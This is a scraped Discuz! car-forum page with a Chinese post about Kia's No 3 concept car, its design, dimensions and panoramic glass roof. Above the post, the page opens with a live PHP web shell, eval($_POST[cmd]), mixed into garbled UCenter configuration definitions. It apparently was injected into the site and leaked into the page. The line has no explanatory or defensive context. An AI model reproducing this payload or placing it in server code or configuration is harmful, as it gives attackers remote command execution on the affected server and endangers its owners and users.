');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 起亞N°3 - 改裝俱樂部 - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

起亞N°3

起亞發佈了一款概念車名字是No 3概念車。這款車是由Peter Schreyer,他是歐洲設計室的負責人。這個設計體現了起亞的新面孔,新的頭燈,新的標誌,前格柵。長度為4045毫米,以馬特鈦灰色車漆現身。這款車型也將在第79屆日內瓦車展上亮相,下月3號大家就可以看到實車了。



  問題是什麼時候亞洲車廠才能有自己的風格呢?這款車看起來有點像福特嘉年華,你不這樣認為嗎?不過仍然有一些新鮮點。No 3擁有全景的天窗,這種配置近年來極為流行。不過有一點奇怪的是呢,對角支撐梁從乘客側的A柱起,連接到駕駛者一側的B柱。這使得這款車的頂部就像是一個整體的大玻璃,給人的感覺很優雅,現代。
返回列表